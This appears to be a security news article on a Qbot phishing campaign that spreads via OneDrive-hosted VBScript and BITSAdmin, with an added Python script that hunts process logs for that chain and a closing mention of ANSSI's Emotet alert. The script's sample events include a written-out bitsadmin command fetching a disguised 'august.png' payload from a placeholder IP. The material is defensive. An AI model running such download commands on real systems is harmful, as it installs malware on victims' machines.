Qbot, an information-stealing Trojan that has been around for about 10 years, has resurfaced with a new phishing-based infection technique capable of bypassing anti-spam defenses. Varonis Security Research discovered the new Qbot campaign in March. Investigators positively identified 2,726 victims based on an analysis of one of the attacker's servers, but they suspect that the actual number of victims is much higher.

Qbot, also known as QakBot, is known for its polymorphic behavior and its worm-like tendencies, such as the ability to self-replicate via shared drives and removable media. On this occasion, Qbot has spread through a phishing campaign targeting US corporations as well as victims in Europe, Asia and South America.

This variant of Qbot is delivered through phishing emails containing a link to what appears to be an online document. The email is crafted to look like a reply within an existing thread, under the guise of continuing a pre-existing business correspondence, which helps it evade spam filters. The goal of the attacks is to steal financial information, including bank account credentials.

The infection chain itself is typical. A phishing email arrives with a link to a Microsoft OneDrive file that delivers a Visual Basic Script (VBScript) inside a compressed ZIP archive. If the file is opened, the script spawns the legitimate Windows BITSAdmin utility, which in turn launches another native Windows utility, Wscript.exe; this is used to download the Qbot payload, named "august.png", from the attacker's server. Every binary in the chain is a signed Windows component, so the download does not by itself trip signature-based controls; what stands out is the combination of a script host, a BITS transfer, and an executable payload disguised with an image extension.
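The chain described above can be hunted in process-creation telemetry. The following is an added example (not code from the page, from Varonis, or from any detection product) that scores Sysmon-style process events for two indicators drawn from the chain: bitsadmin.exe running a /transfer with a Windows Script Host as its parent, and a BITS download whose URL ends in an image extension such as .png. The event records and the IP address 203.0.113.10 are constructed sample data, and the field names (Image, ParentImage, CommandLine) are an assumption about the log format.

```python
import re
from typing import Dict, List, Tuple

# Windows Script Host binaries that execute .vbs/.js files.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Extensions that suggest an executable payload masquerading as an image.
DECOY_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample events in a simplified Sysmon Event ID 1 layout.
# Event 0 mirrors the chain in the article; events 1 and 2 are benign-looking controls.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high "
                    r"http://203.0.113.10/august.png C:\Users\Public\august.png"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer update /download "
                    r"https://update.example.com/patch.msi C:\Temp\patch.msi"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\alice\Downloads\invoice.vbs"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def url_extension(url: str) -> str:
    """Extension of the URL's path component, lower-cased, without query/fragment."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    name = path.rsplit("/", 1)[-1]
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def check_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event resembles the script-host -> BITSAdmin download chain."""
    reasons: List[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    # Only BITSAdmin transfer jobs are of interest here.
    if image != "bitsadmin.exe" or "/transfer" not in cmd.lower():
        return reasons
    if parent in SCRIPT_HOSTS:
        reasons.append(f"bitsadmin /transfer launched by script host {parent}")
    for url in URL_RE.findall(cmd):
        ext = url_extension(url)
        if ext in DECOY_EXTENSIONS:
            reasons.append(f"bitsadmin downloading {ext} file from {url}")
    return reasons


def hunt(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (index, reasons) for every event that triggers at least one indicator."""
    hits = []
    for i, event in enumerate(events):
        reasons = check_event(event)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {index}:")
        for reason in reasons:
            print(f"  - {reason}")
```

Either indicator alone produces false positives (administrators script BITS jobs, and some legitimate software fetches images with BITS), so in practice the two conditions are worth alerting on together and worth enriching with the parent's own parent, which in this campaign would be the archive or document that delivered the VBScript.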

Meanwhile, the French national cybersecurity agency has issued a notice about an increase in attacks using Emotet, targeting both the private sector and public entities. "For several days, ANSSI has observed that Emotet malware targets French companies and administrations," the ANSSI alert states. Special attention is warranted because Emotet is now used to deploy other malicious code that can have a strong impact on the activity of the victims.

Why mention Emotet in an article about Qbot? Because in the attacks detected by the French authorities, Emotet has been used to deliver several variants of the Qbot family.
